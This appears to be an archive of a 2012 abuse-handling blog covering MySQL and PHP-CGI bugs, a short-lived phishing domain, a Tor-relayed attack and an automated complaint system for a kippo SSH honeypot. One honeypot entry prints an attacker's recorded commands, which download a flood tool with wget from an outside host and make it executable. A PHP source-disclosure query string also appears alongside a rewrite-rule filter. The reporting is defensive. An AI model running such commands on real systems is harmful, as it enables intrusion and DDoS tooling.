As Heise reported, there ia a possible login-bug in MySQL. Enough trials lead to a login without a valid password. At least some distributions are vulnerable (reports from “hetzner” vserver customers).
Archive for the ‘Allgemein’ Category
MySQL-Bug
Monday, June 11th, 2012MAAWG
Saturday, June 2nd, 2012Next week the 25th MAAWG meeting will take place in Berlin.
Let’s see what news can be learned there.
phish-run
Friday, May 25th, 2012This morning, 10:28 a.m. a new domain got created:
Updated Date: 25-may-2012
Creation Date: 25-may-2012
Expiration Date: 25-may-2013
Same day, a few hours later:
No match for “domain”.
>>> Last update of whois database: Fri, 25 May 2012 14:37:56 UTC <<<
So much work for the spammer:
and after about 50 clicks the domain was already removed..
money earned? .. none 🙂
Mini Moog
Wednesday, May 23rd, 2012I am very impressed by the emulation of the “Mini Moog” Synthesizer presented as the Goggles “Doodle” of today – including a 4-track recorder .. whow!
I remember the times when I actually played a Mini Moog back in the 70’s 🙂
php-bug
Friday, May 4th, 2012If you run PHP in cgi-mode you are probably vulnerable to a newly found bug:
Heise: Gefahr-durch-offene-PHP-Luecke
Adding parameters like http://localhost/index.php?-s
to an url can show the source code or even inject or run parametes in the shell.
Until an update exists it might be wise to filter out some string-elements (like “-” without “=”)
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]
new TLDs: ICANN TAS portal down
Thursday, April 12th, 2012Just a few hours before the deadline in submitting new applications passes the online portal
TAS for submitting these broke down..
12 April 2012: Application window closes at 23:59 UTC on 12 April 2012
The database behind is obviously not stress-tested or poorly designed.
Funny that ICANN demands detailed technical expertise for applicants but fails
when data is really submitted.
cite from ICANN-page::
ICANN constantly monitors the performance of the TLD Application System (TAS). Recently, we received a report of unusual behavior with the operation of the TAS system. We then identified a technical issue with the TAS system software.
ICANN is taking the most conservative approach possible to protect all applicants and allow adequate time to resolve the issue. Therefore, TAS will be shut down until Tuesday at 23:59 UTC - unless otherwise notified before that time.
In order to ensure all applicants have sufficient time to complete their applications during the disruption, the application window will remain open until 23:59 UTC on Friday, 20 April 2012.
We apologize for any inconvenience this has caused. If you have any questions, please contact the gTLD Customer Service Center (CSC) via the CSC portal.
Tor exit node used for attack
Wednesday, March 21st, 2012One recent reply to a kippo-attack complaint explained that the attacking ip is a TOR exit node.
Of course there is no way for us to find the real attacker when he/she is using TOR
for making this attack. Sad that this important service is abused in this way.
The system you have identified (cs-tor.bu.edu / 204.8.156.142) is an exit node on the Tor network. Tor is a distributed cryptographic anonymizing proxy service. The network traffic you detected was merely relayed through this system, and did not originate there. It is not possible to trace these connections back to their original source.
sshd complaints – update
Wednesday, March 14th, 2012The automatic complaint-mechanism is now active. A X-ARF complaint is generated
for each session where a successful login into the kippo-honeypot produced some
recorded commands. The email address where the complaint is sent to is generated
like always – check own database, check ripe-website and check abusix.
Here is an example of the second mime-part:
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="report.yaml"
—
Reported-From: spamtrap@netcologne.de
Category: abuse
Report-Type: login-attack
Destination-System: kippo – sshd honeypot
User-Agent: PHREAK 1.3
Report-ID: 2faf4f486d7f11e18949797f346be17f@netcologne.de
Date: 2012-03-14 03:45:28
Service: sshd
Port: 22
Source: 89.129.**.** (obfuscated)
Source-Type: ipv4
Attachment: text/plain
Schema-URL: http://www.x-arf.org/schema/abuse_login-attack_0.1.2.json
Version: 1.0.1
and the third MIME-part looks like this:
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="command.txt"
recorded commands during this session:
w
uname -a
wget http://root-arhive.at.ua/flood/udp.tgz
tar zxvf udp.tgz
rm -rf udp.tgz
chmod +x *
–===============0648269240==–
sshd-complaints
Friday, March 9th, 2012I am pretty close to start sending out complaints
for successful sshd – logins on my kippo honeypot.
The X-ARF part is ready. I decided to add the recorded
commands in the 3rd MIME-part. The ttylog could also
be useful, but the receiver of the complaint is probably
not so interested in starting the playlog utility for
each complaint.
I still need to implement a database check so that receivers
only get a handful complaints and are not overwhelmed by the
number of complaints..
Additionally the catched ips will be added in our blacklist,
just like in the attacks cachted by nepenthes.
Dionaea-attacks will come next 🙂
projecthoneypot.org
Thursday, January 26th, 2012Today I received a notification from projecthoneypot.org
that one of my donated spamtrap-domains helped to catch a new
harvester. Feels good to be able to help 🙂